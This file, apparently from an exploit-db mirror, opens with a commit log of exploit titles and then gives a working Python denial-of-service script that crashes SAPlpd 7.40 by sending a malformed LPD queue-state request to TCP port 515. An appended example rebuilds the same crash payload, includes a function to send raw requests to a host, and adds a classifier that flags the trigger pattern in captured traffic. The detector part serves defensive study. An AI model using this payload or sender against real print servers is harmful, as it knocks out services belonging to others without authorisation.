exploit-db-mirror/platforms/windows/dos/41030.py
Offensive Security a0c8330781 DB: 2017-01-13
13 new exploits

SeaMonkey 1.1.14 - (marquee) Denial of Service
SeaMonkey 1.1.14 - Denial of Service

Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)

SapLPD 7.40 - Denial of Service

CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow
CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (2)

aSc Timetables 2017 - Buffer Overflow

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation

Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)
Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)

PlaySMS 0.7 - SQL Injection
PlaySms 0.7 - SQL Injection

SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)
SapLPD 6.28 - Buffer Overflow (Metasploit)

Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)

phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)
phpMyFamily 1.4.0 - Authentication Bypass

ACNews 1.0 - Admin Authentication Bypass (SQL Injection)
ACNews 1.0 - Authentication Bypass

ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection
ASPThai.Net Guestbook 5.5 - Authentication Bypass

PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion
PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion

cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion
CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion

WSN Guest 1.21 - (comments.php id) SQL Injection
WSN Guest 1.21 - 'id' Parameter SQL Injection

PNPHPBB2 <= 1.2 - (index.php c) SQL Injection
PNPHPBB2 <= 1.2 - 'index.php' SQL Injection

PNPHPBB2 <= 1.2i - viewforum.php SQL Injection
PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection

PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion
PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion

webClassifieds 2005 - (Authentication Bypass) SQL Injection
webClassifieds 2005 - Authentication Bypass
webSPELL 4.01.02 - 'id' Remote Edit Topics
PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion
WSN Guest 1.23 - 'Search' SQL Injection
webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics
PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion
WSN Guest 1.23 - 'Search' Parameter SQL Injection

Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection
Ayemsis Emlak Pro - Authentication Bypass
Joomla! Component com_phocadocumentation - 'id' SQL Injection
phpauctionsystem - Cross-Site Scripting / SQL Injection
Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection
PHPAuctionSystem - Cross-Site Scripting / SQL Injection

RiotPix 0.61 - (forumid) Blind SQL Injection
RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection

RiotPix 0.61 - (Authentication Bypass) SQL Injection
RiotPix 0.61 - Authentication Bypass
playSms 0.9.3 - Multiple Remote / Local File Inclusion
BlogHelper - 'common_db.inc' Remote Config File Disclosure
PollHelper - 'poll.inc' Remote Config File Disclosure
PlaySms 0.9.3 - Multiple Remote / Local File Inclusion
BlogHelper - Remote Config File Disclosure
PollHelper - Remote Config File Disclosure

Fast FAQs System - (Authentication Bypass) SQL Injection
Fast FAQs System - Authentication Bypass

Fast Guest Book - (Authentication Bypass) SQL Injection
Fast Guest Book - Authentication Bypass
BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection
Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection
BKWorks ProPHP 0.50b1 - Authentication Bypass
Weight Loss Recipe Book 3.1 - Authentication Bypass
Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection
Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection
Dark Age CMS 0.2c Beta - Authentication Bypass
Syzygy CMS 0.3 - Authentication Bypass
eFAQ - (Authentication Bypass) SQL Injection
eReservations - (Authentication Bypass) SQL Injection
The Walking Club - (Authentication Bypass) SQL Injection
Ping IP - (Authentication Bypass) SQL Injection
eFAQ - Authentication Bypass
eReservations - Authentication Bypass
The Walking Club - Authentication Bypass
Ping IP - Authentication Bypass

ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection
ASP ActionCalendar 1.3 - Authentication Bypass

Click&Email - (Authentication Bypass) SQL Injection
Click&Email - Authentication Bypass

Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection
Web-Calendar Lite 1.0 - Authentication Bypass

ClickAuction - (Authentication Bypass) SQL Injection
ClickAuction - Authentication Bypass

Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection
Netartmedia Car Portal 1.0 - Authentication Bypass

SalesCart - (Authentication Bypass) SQL Injection
SalesCart - Authentication Bypass
WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection
WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection
WholeHogSoftware Ware Support - Authentication Bypass
WholeHogSoftware Password Protect - Authentication Bypass

ClickCart 6.0 - (Authentication Bypass) SQL Injection
ClickCart 6.0 - Authentication Bypass

Online Grades 3.2.4 - (Authentication Bypass) SQL Injection
Online Grades 3.2.4 - Authentication Bypass

MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection
MyDesing Sayac 2.0 - Authentication Bypass
AuthPhp 1.0 - (Authentication Bypass) SQL Injection
Mynews 0_10 - (Authentication Bypass) SQL Injection
BlueBird Pre-Release - (Authentication Bypass) SQL Injection
AuthPhp 1.0 - Authentication Bypass
Mynews 0_10 - Authentication Bypass
BlueBird Pre-Release - Authentication Bypass

Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)
Grestul 1.x - Authentication Bypass (Cookie SQL Injection)

XGuestBook 2.0 - (Authentication Bypass) SQL Injection
XGuestBook 2.0 - Authentication Bypass

PenPal 2.0 - (Authentication Bypass) SQL Injection
PenPal 2.0 - Authentication Bypass

BannerManager 0.81 - (Authentication Bypass) SQL Injection
BannerManager 0.81 - Authentication Bypass

Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection
Free PHP Petition Signing Script - Authentication Bypass
Simbas CMS 2.0 - (Authentication Bypass) SQL Injection
WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection
Simbas CMS 2.0 - Authentication Bypass
WebFileExplorer 3.1 - Authentication Bypass

My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection
My Dealer CMS 2.0 - Authentication Bypass

XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection
XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass

NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection
NetHoteles 2.0/3.0 - Authentication Bypass

Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection
Tiny Blogr 1.0.0 rc4 - Authentication Bypass

ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection
ClanTiger 1.1.1 - Authentication Bypass

Hot Project 7.0 - (Authentication Bypass) SQL Injection
Hot Project 7.0 - Authentication Bypass

EZ Webitor - (Authentication Bypass) SQL Injection
EZ Webitor - Authentication Bypass

Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection
Creasito E-Commerce 1.3.16 - Authentication Bypass

I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection
I-Rater Pro/Plantinum 4.0 - Authentication Bypass

5 star Rating 1.2 - (Authentication Bypass) SQL Injection
5 star Rating 1.2 - Authentication Bypass

Tiger Dms - (Authentication Bypass) SQL Injection
Tiger Dms - Authentication Bypass
The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup
Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection
Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection
The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup
Realty Web-Base 1.0 - Authentication Bypass
Luxbum 0.5.5/stable - Authentication Bypass

My Game Script 2.0 - (Authentication Bypass) SQL Injection
My Game Script 2.0 - Authentication Bypass

Submitter Script - (Authentication Bypass) SQL Injection
Submitter Script - Authentication Bypass

PHP Dir Submit - (Authentication Bypass) SQL Injection
PHP Dir Submit - Authentication Bypass

DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection
DM FileManager 3.9.2 - Authentication Bypass

VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection
VICIDIAL 2.0.5-173 - Authentication Bypass

Article Directory - (Authentication Bypass) SQL Injection
Article Directory - Authentication Bypass

phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection
phpBugTracker 1.0.3 - Authentication Bypass

Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection
Zen Help Desk 2.1 - Authentication Bypass

EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection
EgyPlus 7ml 1.0.1 - Authentication Bypass

Pixelactivo 3.0 - (Authentication Bypass) SQL Injection
Pixelactivo 3.0 - Authentication Bypass

MyCars Automotive - (Authentication Bypass) SQL Injection
MyCars Automotive - Authentication Bypass

Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection
Zip Store Chat 4.0/5.0 - Authentication Bypass

AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection
AlumniServer 1.0.1 - Authentication Bypass

ForumPal FE 1.1 - (Authentication Bypass) SQL Injection
ForumPal FE 1.1 - Authentication Bypass

Opial 1.0 - (Authentication Bypass) SQL Injection
Opial 1.0 - Authentication Bypass

webLeague 2.2.0 - (Authentication Bypass) SQL Injection
webLeague 2.2.0 - Authentication Bypass

AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection
AnotherPHPBook (APB) 1.3.0 - Authentication Bypass

SaphpLesson 4.0 - (Authentication Bypass) SQL Injection
SaphpLesson 4.0 - Authentication Bypass

Limny 1.01 - (Authentication Bypass) SQL Injection
Limny 1.01 - Authentication Bypass

Magician Blog 1.0 - (Authentication Bypass) SQL Injection
Magician Blog 1.0 - Authentication Bypass

AW BannerAd - (Authentication Bypass) SQL Injection
AW BannerAd - Authentication Bypass

Ajax Short URL Script - (Authentication Bypass) SQL Injection
Ajax Short URL Script - Authentication Bypass
TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection
SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection
TT Web Site Manager 0.5 - Authentication Bypass
SimpleLoginSys 0.5 - Authentication Bypass

Questions Answered 1.3 - (Authentication Bypass) SQL Injection
Questions Answered 1.3 - Authentication Bypass

Blink Blog System - (Authentication Bypass) SQL Injection
Blink Blog System - Authentication Bypass

MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection
MOC Designs PHP News 1.1 - Authentication Bypass

PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection
PHotoLa Gallery 1.0 - Authentication Bypass

PHPCityPortal - (Authentication Bypass) SQL Injection
PHPCityPortal - Authentication Bypass

Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection
Logoshows BBS 2.0 - Authentication Bypass

SmilieScript 1.0 - (Authentication Bypass) SQL Injection
SmilieScript 1.0 - Authentication Bypass

humanCMS - (Authentication Bypass) SQL Injection
humanCMS - Authentication Bypass

Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection
Three Pillars Help Desk 3.0 - Authentication Bypass

AdsDX 3.05 - (Authentication Bypass) SQL Injection
AdsDX 3.05 - Authentication Bypass

Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection
Nephp Publisher Enterprise 4.5 - Authentication Bypass

W3infotech - (Authentication Bypass) SQL Injection
W3infotech - Authentication Bypass

Real Estate Portal X.0 - (Authentication Bypass) SQL Injection
Real Estate Portal X.0 - Authentication Bypass

PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)
PHP Inventory 1.2 - Authentication Bypass

SitePal 1.1 - (Authentication Bypass) SQL Injection
SitePal 1.1 - Authentication Bypass

JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection
JM CMS 1.0 - Authentication Bypass

Pre Hospital Management System - (Authentication Bypass) SQL Injection
Pre Hospital Management System - Authentication Bypass

Digiappz Freekot - (Authentication Bypass) SQL Injection
Digiappz Freekot - Authentication Bypass

Omnistar Affiliate - (Authentication Bypass) SQL Injection
Omnistar Affiliate - Authentication Bypass

PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection
PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass

Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection
Advance Biz Limited 1.0 - Authentication Bypass
e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection
e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection
e-topbiz banner exchange PHP - Authentication Bypass
e-topbiz Slide Popups 1 PHP - Authentication Bypass

Freewebscript'z Games - (Authentication Bypass) SQL Injection
Freewebscript'z Games - Authentication Bypass

DZOIC Handshakes - Authentication Bypass (SQL Injection)
DZOIC Handshakes - Authentication Bypass

DZOIC ClipHouse - Authentication Bypass (SQL Injection)
DZOIC ClipHouse - Authentication Bypass

PHP Car Rental-Script - (Authentication Bypass) SQL Injection
PHP Car Rental-Script - Authentication Bypass
Zen Tracking 2.2 - (Authentication Bypass) SQL Injection
Baal Systems 3.8 - (Authentication Bypass) SQL Injection
Zen Tracking 2.2 - Authentication Bypass
Baal Systems 3.8 - Authentication Bypass

Killmonster 2.1 - (Authentication Bypass) SQL Injection
Killmonster 2.1 - Authentication Bypass

Rostermain 1.1 - (Authentication Bypass) SQL Injection
Rostermain 1.1 - Authentication Bypass

NewsLetter Tailor - (Authentication Bypass) SQL Injection
NewsLetter Tailor - Authentication Bypass

WSN Guest 1.02 - (orderlinks) SQL Injection
WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection

Project Man 1.0 - (Authentication Bypass) SQL Injection
Project Man 1.0 - Authentication Bypass

Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection
Uiga Fan Club 1.0 - Authentication Bypass

HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection
HazelPress Lite 0.0.4 - Authentication Bypass

Majoda CMS - (Authentication Bypass) SQL Injection
Majoda CMS - Authentication Bypass

4x CMS r26 - (Authentication Bypass) SQL Injection
4x CMS r26 - Authentication Bypass
Satellite-X 4.0 - (Authentication Bypass) SQL Injection
Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection
Satellite-X 4.0 - Authentication Bypass
Huron CMS 8 11 2007 - Authentication Bypass

Zyke CMS 1.1 - (Authentication Bypass) SQL Injection
Zyke CMS 1.1 - Authentication Bypass

Online University - (Authentication Bypass) SQL Injection
Online University - Authentication Bypass

Online Job Board - (Authentication Bypass) SQL Injection
Online Job Board - Authentication Bypass

JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)
JE CMS 1.0.0 - Authentication Bypass

ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection
ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection

SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)
SN News 1.2 - '/admin/loger.php' Authentication Bypass

RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection
RTTucson Quotations Database Script - Authentication Bypass

PlaySms - 'index.php' Cross-Site Scripting
PlaySms 0.8 - 'index.php' Cross-Site Scripting

Practico CMS 13.7 - Authentication Bypass (SQL Injection)
Practico CMS 13.7 - Authentication Bypass

Airbnb Clone Script - Arbitrary File Upload

Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection
Milw0rm Clone Script 1.0 - Authentication Bypass

PHPCollab CMS 2.5 - (emailusers.php) SQL Injection
PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection

My link trader 1.1 - 'id' Parameter SQL Injection
My Link Trader 1.1 - 'id' Parameter SQL Injection
b2evolution 6.8.2 - Arbitrary File Upload
Job Portal Script 9.11 - Authentication Bypass
Online Food Delivery 2.04 - Authentication Bypass
iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection
D-Link DIR-615 - Multiple Vulnerabilities
School Management Software 2.75 - SQL Injection
Penny Auction Script - Arbitrary File Upload
ECommerce-TIBSECART - Arbitrary File Upload
ECommerce-Multi-Vendor Software - Arbitrary File Upload
2017-01-13 05:01:18 +00:00
# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
import socket

# SAPlpd speaks LPD (RFC 1179) on TCP/515: one opcode byte, a queue name and a
# terminating LF (0x0a). Opcodes 03h (short queue state) and 04h (long queue
# state) are vulnerable to the bad characters 00h and 0ah, so the DoS can be
# modified accordingly; here the 0x0a sits directly after the opcode.
# The added 800 A's are just to show that a complete shell could be delivered
# with the command.
TARGET = '192.168.198.132'   # SAPlpd host used during testing; adjust as needed
DoS = b"\x03" + b"\x0a" + b"\x41" * 800   # bytes, so this runs on Python 3 as well

s = socket.socket()
s.settimeout(1)
s.connect((TARGET, 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: " + str(len(DoS)) + " bytes")
s.sendall(DoS)
s.close()
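The following is an added example and not part of the exploit above, nor code from the exploit author or SAP. It encodes the RFC 1179 framing that the exploit abuses (opcode byte, queue name, optional operands, LF terminator) so a practitioner can build well-formed queue-state requests, reproduce the exploit's payload shape for any of the reported opcode/bad-character combinations, and classify captured TCP/515 requests to spot the trigger pattern. The verdict strings, the sample traffic and the function names are this example's own choices; the only facts taken from the page are that opcodes 03h/04h with 00h/0ah are the reported condition.

```python
"""LPD (RFC 1179) request builder and malformed-request classifier.

Added example: not part of the original exploit. Verdict names and the
sample traffic below are constructed for illustration.
"""
import socket

LPD_PORT = 515

# RFC 1179 section 5 command codes
PRINT_WAITING = 0x01
RECEIVE_JOB = 0x02
QUEUE_STATE_SHORT = 0x03
QUEUE_STATE_LONG = 0x04
REMOVE_JOBS = 0x05
VALID_OPCODES = {PRINT_WAITING, RECEIVE_JOB, QUEUE_STATE_SHORT,
                 QUEUE_STATE_LONG, REMOVE_JOBS}
QUEUE_STATE_OPCODES = {QUEUE_STATE_SHORT, QUEUE_STATE_LONG}

# Bytes the exploit header reports as "bad characters" for 03h/04h.
BAD_CHARS = (b"\x00", b"\x0a")


def build_queue_state_request(queue, long_form=False, jobs=()):
    """Well-formed RFC 1179 'send queue state' request.

    Layout: opcode, queue name, zero or more SP-prefixed job numbers or
    user names, terminating LF. Rejects names that would break the framing.
    """
    name = queue.encode("ascii")
    if not name or any(c in name for c in BAD_CHARS) or b" " in name:
        raise ValueError("queue name must be non-empty and free of NUL, LF and SP")
    opcode = QUEUE_STATE_LONG if long_form else QUEUE_STATE_SHORT
    operands = b"".join(b" " + j.encode("ascii") for j in jobs)
    return bytes([opcode]) + name + operands + b"\n"


def build_dos_payload(opcode=QUEUE_STATE_SHORT, bad_char=b"\x0a", padding=800):
    """Reproduce the exploit's payload shape: opcode, bad character, filler."""
    if opcode not in QUEUE_STATE_OPCODES or bad_char not in BAD_CHARS:
        raise ValueError("only 03h/04h with 00h/0ah match the reported condition")
    return bytes([opcode]) + bad_char + b"A" * padding


def classify_lpd_request(data):
    """Classify the first LPD command seen on a connection.

    Verdicts (names chosen for this example):
      "short"         fewer than two bytes
      "bad-opcode"    first byte outside 01h..05h
      "trigger"       03h/04h with LF directly after the opcode (empty queue
                      name) or a NUL inside the queue-name field, i.e. the
                      pattern the SAPlpd 7.40 DoS sends
      "unterminated"  no LF terminator
      "trailing-data" bytes after the LF on a single-command opcode
      "ok"            well-formed
    """
    if len(data) < 2:
        return "short"
    opcode = data[0]
    if opcode not in VALID_OPCODES:
        return "bad-opcode"
    lf = data.find(b"\n")
    body = data[1:] if lf == -1 else data[1:lf]
    # The queue name is the first SP-separated field after the opcode.
    queue = body.split(b" ", 1)[0]
    if opcode in QUEUE_STATE_OPCODES and (lf == 1 or b"\x00" in queue):
        return "trigger"
    if lf == -1:
        return "unterminated"
    # 02h is followed by sub-commands once the server ACKs, so more bytes are
    # expected there; every other opcode is a single line per connection.
    if opcode != RECEIVE_JOB and lf != len(data) - 1:
        return "trailing-data"
    return "ok"


# Constructed sample traffic, as a sensor on TCP/515 might capture it.
SAMPLES = {
    "lpq from a client": build_queue_state_request("lp"),
    "lpq -l root": build_queue_state_request("lp", long_form=True, jobs=("root",)),
    "saplpd dos": build_dos_payload(),
    "nul in queue name": b"\x04lp\x00\n",
    "no terminator": b"\x03lp",
}


def scan(samples=SAMPLES):
    """Return {label: verdict} for each captured request."""
    return {label: classify_lpd_request(req) for label, req in samples.items()}


def send_lpd(host, payload, timeout=1.0, port=LPD_PORT):
    """Deliver a raw LPD request to a host (needs network; not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


if __name__ == "__main__":
    for label, verdict in scan().items():
        print(f"{label:20s} -> {verdict}")
```

`build_dos_payload()` with its defaults yields exactly the bytes the exploit sends; `classify_lpd_request` reports it as "trigger" while normal `lpq`-style requests classify as "ok", which is the distinction a network sensor or a pre-patch compensating control on port 515 would need to make.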